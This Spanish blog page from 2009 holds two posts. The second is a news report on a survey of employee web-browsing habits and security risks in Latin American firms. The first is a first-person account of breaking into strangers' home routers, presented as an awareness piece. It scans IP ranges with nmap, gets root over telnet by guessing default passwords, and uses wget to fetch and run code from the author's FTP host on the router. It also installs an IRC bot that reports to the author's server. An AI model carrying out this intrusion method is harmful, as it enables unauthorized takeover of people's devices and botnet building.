jueves, 26 de noviembre de 2009

Hacking Routers (El agujero de seguridad del usuario domestico)

En este artículo voy a hacer una descripción de cómo llegué a tomar el control absoluto de varios cientos de pequeños equipos conectados a la red de redes, describiré el porqué es una amenaza mundial y vaticinaré que el futuro del hacking irá por este camino. Pero lo más inquietante será que cualquiera con un poco de suerte puede repetir lo mismo que yo hice.

Prólogo


Bien, hace algunos años, aquellos que empezábamos con internet contratábamos nuestra linea de 56k con un ruidoso y chirriante modem. Poco después, vino el ADSL, trayendo vertiginosas velocidades de 1mb. Pero en todo esto había una gran amenenaza que las compañías telefónicas no vieron: cualquiera en su casa podía montar un pequeño servidor. Es cierto que las velocidades de subida no podían dar pie a grandes servicios, pero sí eran lo suficientemente grandes como para abrir un puerto a la escucha y poner una shell remota. En cualquier momento, un atacante podría escanear un rango de IPs y cuando detectara cierto puerto abierto era sinónimo de que estaba infectado con el famoso troyano, tomando el control absoluto del ordenador. Era la época del famoso SubSeven.

De cómo SubSeven cayó en el olvido


A medida que pasaba el tiempo, al abaratarse los equipos informáticos, los usuarios comenzaron a adquirir más ordenadores. Pero el problema era que con los antiguos modem tan solo se podia conectar uno a internet, y en caso de querer encufar más máquinas a la red, hacía falta un engorroso proceso. Fue entonces cuando la gente comenzó a comprar routers, hubs ethernet que permitían comunicar cuatro o más equipos con el mundo exterior. Esta práctica se popularizó, hasta que las propias compañías proveedoras de servicios proporcionaban equipos híbridos módem-router, que son los que conocemos ahora.

Al utilizar un router, los paquetes que llegan de fuera deben decidir el camino a tomar, porque si hay cuatro ordenadores en la red interna peude ser un auténtico lío. Para eso necesita tablas de enrutamiento. Y si uno quiere conectarse a un ordenador, antes tiene que dar cuentas al router, que debe de estar correctamente configurado para que cuando le decimos "router, conéctame con la máquina x en el puerto 80", este nos lleve efectivamente a la máquina x en el puerto 80. Por defecto, todos los puertos en los routers están desenrutados, por lo que, a menos que se abran manualmente, este aparatito cuadrado hará oídos sordos de cualquier requerimiento de conexión. El SubSeven había muerto.

Máquinas de pocas palabras


Los troyanos de conexión directa ya no eran útiles, pero nunca se cierra una puerta sin que se abra una ventana. Para configurar el router, ciertamente, hacía falta una interfaz. Para ello, estos quedaban a la escucha con un servidor HTTP detrás, y cuando un usuario lo requiriera, ya fuese desde la red local o desde el exterior, el aparato te permitía configurarlo correctamente, siempre y cuando supieras el santo y seña. Y he aquí el quid de la cuestión, la contraseña en casi todos los casos era la misma que traía de fábrica. El 90% de los usuarios no la habrían cambiado, tal vez ni siquiera sabría qué coño es eso. Probando cosas como "admin", "root", "password", "1234"... cualquier atacando sin nada mejor que hacer podía tomar control absoluto de tus tablas de erutamiento.

Pero claro, siempre habían usuarios avispados, que la cambiaban con presteza. El problema ahora era que los routers domésticos antiguos no te permitían, en el mejor de los casos, exceder los seis carácteres. Así que un atancante un poco más mañoso, con una sencilla herramienta que probase todas las combinaciones, si se le metía en los cojones acababa accediendo a las enrutadas tripas del engendro.

Sofisticación VS Seguridad


Internet creció, las páginas se hicieron más pesadas, el streamming de audio y video provocaban auténticos trombos de datos, y es por eso que el bando de ancha creció, y con el la velocidad de acceso del usuario medio. Para manejar tremenda cantidad de datos, los routers tenían que ser más sofisticados, y sus pequeños ordenadores emebebidos más potentes. Los software de configuración cambiaron, y ahora tambien ofrecían configuración por FTP, telnet, SSH, HTTPS y el antiguo HTTP. Todo muy bonito y configurable, pero esto entraña otro riesgo: a más servicios, más puertos abiertos. Y a más puertos, hace falta un sistema más grande y estable. Y a más grande sea el sistema, más código tiene. Y a más código tiene, más bugs posee. Si a esto sumamos que el usuario sigue sin cambiar la contraseña en sus bonitos routers, tenemos el sueño de cualquier piratilla informático.

Idea general del ataque

Desde hace unos pocos años, si un router tiene abiertos los puertos 22 o 23 (SSH y telnet), significará que no solo tiene un pequeño interfaz de configuración, si no un pequeño linux embebido. Muchas marcas de routers los tienen. Si nos conseguimos colar como usuario root el sistema se verá seriamente comprometido. Y si una vez estamos dentro como root, subimos e instalamos un programita que a su vez escanee la red en busca de más equipos vulnerables, tendríamos un gusano peligrosísimo. Y no solo eso: ¿porqué no montar un servidor HTTP, FTP o incluso IRC? Las máquinas tienen un pequeño disco duro, y pocos recursos, pero si yo quiero distribuir material ilegal podría se runa buena opción. Además, casi todos los routers cuentan con un servicio de actualización de DNS dinámico, como DynDNS o No-IP. Con una dirección fija, ya tendríamos un server en toda regla.

El sueño de todo hacker es obtener root en un servidor. Esto te da control absoluto. Pero si además eres indetectable por parte del usuario (si este deja la contraseña que trae el router por defeto, ¿va a explorar quien puede estar en su sistema?) y por los firewalls y antivirus, estamos ante una utopía.

Comenzando el asalto


En este ejemplo, que es totalmente real, no daré detalles como IPs, o rangos de IP's donde se pueden encontrar equipos vulnerables, ni de compañías que instalan este tipo de routers o de países. Eso sería una irresponsabilidad por mi parte, y se aleja del objetivo didáctico de este artículo. Tan solo diré que es bastante común encontrar un router vulnerable.

Bien, lo primero es hacerse con las herramientas necesarias. Nuestro objetivo es arbitrario, o sea, que nos da igual quien sea. Por ello vamos a adquirir la último versión del nmap, un gran programa, de su correspondiente web: http://www.insecure.org. Una vez lo tenemos, tanto en Windows como en Linux, vamos a escanear el rango de IPs donde puede haber una vulnerabilidad:

Código:

nmap -v -v -T4 -F 0.1.2.*


Esto escanería los 255 hosts de esa IP. Nótese que esta es poco menos que ficticia.

Tras un ratito escaneando, el nmap nos debería escupir algunos resultados. Yo, para este ejemplo, me he fijado en este:

Código:

Host dslxxx.xxx.xxx.xxx.xx (xxx.xxx.xxx.130) is up (0.14s latency).
Scanned at 2009-xx-xx xx:x4:35 Romance Standard Time for 91s
Interesting ports on dslxxx.xxx.xxx.xxx.xx (xxx.xxx.xxx.130):
Not shown: 91 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp filtered smtp
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
1723/tcp filtered pptp


Seguramente se trata de un bonito router con una bonita cantidad de puertos abiertos: FTP, SSH, telnet y HTTP. Sin perder más tiempo, abro una línea de comandos (estoy en Windows) y le hago un rápido telnet:

Código:

C:\>telnet xxx.xxx.xxx.130
Connecting To xxx.xxx.xxx.130...

BusyBox on localhost login:


¡Bingo! Tenemos un login por telnet. De igual forma podría ser por SSH, pero bueno, telnet viene a ser los mismo. Veo una palabra clave: "BusyBox". Un rápido googleo me informa de que es un minilinux para sistemas embebidos. Me pide el login, y como yo quiero ser "root", pongo root. Entonces me pide la contraseña. Pruebo varias, como root, admin, 1234, en blanco, password, pass... tras algunos intentos, lo consigo (no diré la verdadera):

Código:


BusyBox on localhost login: root
Password:


BusyBox v0.61.pre (2006.09.25-12:57+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

#


La ostia. A la primera. Estoy como root en un sistema remoto que no actualizan desde el 25 de septiembre de 2006. Esto debe de ser el paraíso. Hago un par de comandos para tantear donde estoy metido:

Código:

# whoami
root
# ls
bin etc proc usr var.tar
dev lib sbin var
# help

Built-in commands:
-------------------
. : bg break builtin cd chdir continue eval exec exit export
false fc fg hash help jobs kill local pwd read readonly return
set setvar shift times trap true type ulimit umask unset wait

# busybox
BusyBox v0.61.pre (2006.09.25-12:57+0000) multi-call binary

Usage: busybox [function] [arguments]...
or: [function] [arguments]...

BusyBox is a multi-call binary that combines many common Unix
utilities into a single executable. Most people will create a
link to busybox for each function they wish to use, and BusyBox
will act like whatever it was invoked as.

Currently defined functions:
[, ash, busybox, cat, chgrp, chmod, chown, cp, cut, dd, df, echo,
false, free, grep, hostname, id, ifconfig, init, insmod, kill,
ln, login, ls, lsmod, mkdir, modprobe, mount, mv, passwd, ping,
ps, pwd, reboot, rm, rmmod, route, sh, sleep, sync, tar, test,
tftp, touch, true, tty, umount, wget, whoami, yes

#


Como pueden ver, esoy en el directorio / de un sistema Linux como usuario "root". Vamos a echar un vistazo alrededor:

Código:

# cd proc
# ls
1 4 avalanche iomem misc sysvipc
102 41 bus ioports modules ticfg
111 5 cmdline kcore mounts tty
1586 6 cpuinfo kmsg mtd tzval
1587 676 devices ksyms net uptime
1591 7 dma led_mod partitions version
2 73 driver loadavg self wlan
3 75 execdomains locks slabinfo
319 76 filesystems meminfo stat
361 98 fs mii_read swaps
377 99 interrupts mii_write sys
# cat version
Linux version 2.4.17_mvl21-malta-mips_fp_le (beri@debian) (gcc version 2.95.3 20
010315 (release/MontaVista)) #1 Mon Sep 25 15:52:29 EEST 2006
# cat cpuinfo
processor : 0
cpu model : MIPS 4KEc V4.8
BogoMIPS : 211.35
wait instruction : no
microsecond timers : yes
extra interrupt vector : yes
hardware watchpoint : yes
VCED exceptions : not available
VCEI exceptions : not available
#


Con esto obtenemos un poco más de información. La versión del kernel es bastante antigua (2.4.17), compilada para un procesador MIPS de 4K. ¿Quien necesita más? ¿No es esto suficiente para hacer maldades? Y lo mejor esque ni siquiera necesito ejecutar un exploit que me permita ser root. Ya lo soy.

Bueno, llegados a este punto, no se puede perder el tiempo. Veo que dispongo del comando wget:

Código:

# wget
BusyBox v0.61.pre (2006.09.25-12:57+0000) multi-call binary

Usage: wget [-c|--continue] [-q|--quiet] [-O|--output-document file]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR] url

#


Por lo que podré obtener cositas de internet.

Me voy a disponer a compilar un simple "Hola Mundo". El código sería el siguiente:

Código:

#include

int main()
{
printf("Hello world.");
}


Me voy a mi otro ordenador, donde tengo Linux, e intento compilarlo. Rápidamente caigo en la cuenta de que necesito un compilador para MIPS. Después de buscar un poco en google descargo este, ya compilado: http://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2. Habrán muchos otros, pero este fue el primero que encontré. Puede que también les sirva. No entraré en detalles, los compilé y lo subí a un servidor FTP gratuito. De nuevo en mi router rooteado, hago:

Código:

# cd var/tmp
# wget http://xxx.ftpserver.com/hello
Set PR mark for socket 0x6 = 239
hello 100% |*****************************| 5551 00:00 ETA
# chmod +x hello
# ./hello
Hello world.#


Fue en este momento cuando sentí un cosquilleo en la boca del estómago. Cogí de internet un ejemplo de bot IRC en C, lo ajusté, corregí un poco el código, lo compilé, lo subí, lo ejecuté y vi con admiración como se conectaba a mi servidor IRC desde un lugar remoto del mundo, completamente a mis órdenes. Podría haberle puesto un comando para que buscase mas equipos vulnerables, con un mini logeador por telnet a fuerza bruta y otro comando para inicar un básico DDoS. No hice nada maligno, pero de querer haberlo hecho, ¿quién iba a impedírmelo? Y es más, de haberlo hecho, ¿quién me iba a descubrir?

Conclusiones


El ejemplo que he descrito se trata de un serio problema de seguridad mundial. Cualquier atacante malintencionado podría instalar bots IRC para hacer ataques DDoS, proxies completamente anónimos, servidores de cualquier tipo, etc. Es cierto que los routers son muy poco potentes, pero el poder dispones de 1000, 2000 o 10000 pequeñas máquinas indetectables, por muy poco potentes que sean, y por muy poco ancho de banda del que dispongan, son una seria amenaza.

Con este artículo no estoy incitando al crimen, más bien todo lo contrario. Intento fomentar el uso de claves seguras, y la responsabilidad del ISP de mantener a sus clientes a su propia red fuera de peligro.

Espero que el ejemplo quede claro. Como dije antes, con el tiempo, los routers serán cada vez más complejos y esto no ha hecho más que empezar. El futuro del hacking, a mi modo de ver, irá por este camino. Esperemos que le encuentren solución rápidamente.

Fuente original: http://www.descifra.me

jueves, 12 de noviembre de 2009

¿Que habitos de navegacion tienen los empleados de una empresa?

Un informe revela cuáles son los hábitos y las actividades que realiza el personal en la Red desde las computadoras corporativas y los controles que efectúan los gerentes informáticos y de tecnología de las compañías argentinas.

Una conducta unifica a gerentes y empleados de empresas grandes y medianas de América latina, en especial la Argentina: tanto a niveles de conducción como trabajadores utilizan su computadora para navegar por sitios web que no tienen relación con su actividad laboral en horas de oficina.

Las grandes compañías locales permiten que su personal tenga acceso a Internet en comparación con firmas de otros países, como Brasil, la nación que más bloquea el acceso a ciertos sitios a sus empleados.



Pero lo que más duele a los encargados de sistemas es que el 72% de los usuarios admitieron que realizaron al menos una actividad que puso en riesgo la seguridad.

Estos datos provienen de una encuesta sobre el uso de Internet en empresas de América latina, al cual accedió iProfesional.com, que revela cuáles son los nuevos hábitos de navegación de los empleados de una organización.

El estudio, realizado por la empresa de seguridad informática Websense, abarcó gerentes de tecnología y empleados de las principales compañías en la Argentina, Brasil, Chile, Colombia, México, Perú y América Central sobre el uso que los trabajadores hacen de Internet cuando están en la oficina y sobre cómo sus hábitos de navegación influyen en la seguridad informática de las organizaciones.

El estudio -encargado por Websense a la firma DMS- realizado entre 700 personas (350 gerentes de tecnología y 350 empleados) de empresas con más de 250 empleados en todos los segmentos de la industria en latinoamérica, reflejó que todos los encuestados, tanto los gerentes como el personal, utilizan su computadora para navegar por páginas no relacionadas con su actividad laboral en horas de oficina.

En la Argentina el 96% de los encuestados dijo acceder a correo personal en horario laboral.

El 27% de los gerentes ofrece a los usuarios acceso a sitios web 2.0 a pesar de entender que estos sitios no son necesarios para su negocio. Por su parte, el 21% bloquea el acceso a estos sitios.

Según el estudio, entre los números 1 del área tecnológica que consideran a la Web 2.0 como una herramienta necesaria para sus negocios, el 21% dijo que no es un problema, mientras que el 20% de ellos piensa que es una pesadilla de administrar.

Además, la mayoría de empresas en América latina permiten que sus empleados tengan acceso a ciertas categorías de sitios. Los más utilizados son portales web como iGoogle (89%) y servicios de correo electrónico como Hotmail, Yahoo, Gmail, etc. (76%).

Los sitios considerados como web 2.0 por los gerentes TI son principalmente redes sociales, tanto para negocios (67%) como para uso personal (48%), y portales web como iGoogle (61%).

Tiempo invertido

La encuesta reveló que los gerentes de tecnología creen que los trabajadores consumen 89 minutos diarios para navegar por Internet para asuntos personales.

Sin embargo, los usuarios admiten que navegan hasta 50 minutos diarios en asuntos diferentes a su actividad laboral.

Las grandes empresas en la Argentina permiten que sus empleados tengan acceso a Internet si se las compara con compañías de otros países. Brasil, en cambio, es la nación que más bloquea el acceso a ciertos sitios a sus empleados.

Actividades riesgosas

El comportamiento en línea de los trabajadores sigue siendo una gran preocupación para casi todos los encargados de TI (un 98%), ya que más del 72% de los usuarios admitieron que han realizado al menos una actividad que puso en riesgo la seguridad.

La actividad en línea que más temor causa entre los directores es el envío de documentos de la oficina hacia cuentas de correo electrónico personal de los miembros de la organización.

Mientras tanto el 71% de los ejecutivos tecnológicos piensan que ésta es la actividad con mayores riesgos, el 46% de los empleados encuestados afirmó realizarla habitualmente.

En comparación con los últimos años, los gerentes de TI están ahora menos preocupados por aquellos trabajadores que permiten que un familiar o amigo utilice la computadora de la oficina para propósitos personales. Es así como esta tasa ha disminuido considerablemente de 56% en 2007, al 20% en 2008 y al 15% en 2009.

En la Argentina, el 30% de las grandes empresas tienen un 20% de sus computadoras infectadas con software espía y el 58% de los gerentes creen que podrían perder sus puestos de trabajo si se fuga de la empresa información confidencial a través de Internet.

Sin embargo, un 66% de los ejecutivos de TI encuestados son los más preocupados porque la seguridad tecnológica no ocupa un lugar suficientemente alto en la agenda corporativa.

Direcciones equivocadas

Otra situación que causa temor entre los encargados informáticos es el envío de mensajes electrónicos a direcciones equivocadas, lo cual propicia la fuga de información interna confidencial. Para 2009, la encuesta Web@Work reveló que esta práctica ha aumentado a un 56%, frente al 20% reportado en 2008.
La mensajería instantánea sigue siendo un dolor de cabeza para los gerentes de tecnología, quienes piensan que el 61% de los empleados la realizan durante horas de oficina.

Aunque el 87% de los empleados consultados dijeron que utilizan la mensajería instantánea para fines laborales, el 12% admitió que la usa para propósitos personales.

Un resultado destacado es el de las conexiones inalámbricas mediante computadoras portátiles de la empresa. El 37% de los consultados utilizan este tipo de conexión cuando viajan o trabajan de forma remota.

Actividades personales

Según la encuesta, las visitas a sitios web no relacionados con la actividad laboral se incrementaron en comparación con los resultados de 2008. En general, el acceso a páginas web que no tienen vínculo con el trabajo es una práctica común entre el 99% de los empleados consultados.

De forma similar, el 72% de los empleados tienen el hábito de visitar cinco o más páginas web de carácter personal. Por su parte, el 100% de los gerentes creen que el personal tiene este tipo de comportamiento.

Las páginas web más visitadas por los empleados son:
  • Noticias y medios de comunicación (85%)
  • Bancos y empresas financieras (79%)
  • Sitios de gobierno (75%)
A pesar de algunas diferencias, (94%, 92% y 91%, respectivamente), los gerentes TI tienen una percepción correcta de los sitios web más visitados por los empleados. El acceso a sitios bancarios y financieros fue el de preferencia por los argentinos encuestados.

Percepciones

El 96% de los encargados informáticos confían en que sus empresas están protegidas de alguna forma contra las amenazas de seguridad de Internet, aunque muy pocos (sólo el 4%) cree que su compañía lo está en forma total.

Los trabajadores, por su parte, tienen una percepción muy diferente sobre la protección de la empresa. A pesar de que la tasa ha disminuido, la mayoría de ellos creen estar más seguros de la protección que les brinda la computadora de su oficina.

El registro del nivel de protección TI es significativamente diferente entre todos los países investigados ya que por ejemplo, sólo el 42% de los empleados brasileños dicen estar seguros de tener una protección total, mientras que en México el 70% opina lo mismo.

En términos generales, parece que las empresas más grandes están preocupadas por el tema de la seguridad en Internet, ya que el porcentaje de uso de software específico para contrarrestar los riesgos de seguridad ha aumentado considerablemente en los últimos años.

Además de los firewall (cortafuegos) y antivirus, el 99% de las grandes compañías en América latina tiene por lo menos un tipo adicional de software específico de seguridad de Internet.

Las aplicaciones más comunes son las soluciones de filtro de Internet (91%) y los utilizados para el bloqueo de sitios de phishing (89%).

Empleo en riesgo

Casi todos los entrevistados (95% de los gerentes TI y 93% de los empleados) creen que realizar actividades de riesgo en Internet puede ocasionar la pérdida de su empleo.

Ambos, jerárquicos y trabajadores, tienen la percepción de que sus empresas están tomando más en serio la seguridad de Internet y, por eso, creen que pueden perder su empleo si es sorprendido practicando cualquier actividad de Internet que represente un riesgo.

Según los empleados, la acción más arriesgada es filtrar información confidencial de la empresa, que tuvo casi el mismo promedio del año pasado (pasó de 90% en 2008 a 91% en 2009), seguido por infectar a su empresa con spyware malicioso o un virus, el cual aumentó del 73% al 83%.

La principal preocupación de los gerentes de tecnología es que el personal filtre información confidencial (82%), seguida de la introducción de virus que puedan afectar los procesos de negocio (71%).

Las compañías en la Argentina se preocupan menos por la seguridad de Internet, ya que el 12% de los gerentes TI no perciben práctica en línea de su personal que ponga en peligro su empleo.

El 22% de los ejecutivos argentinos encuestados no pudo asegurar que su firma utilizará un software de filtrado de Internet y el 56% de los Gerentes de TI dicen que la web 2.0 no es necesario para su negocio y, sin embargo, el 68% de ellos dan a los usuarios el acceso a ella.

Fuente: http://tecnologia.infobaeprofesional.com/notas/90003-Que-hacen-los-empleados-cuando-navegan-por-Internet-en-la-empresa.html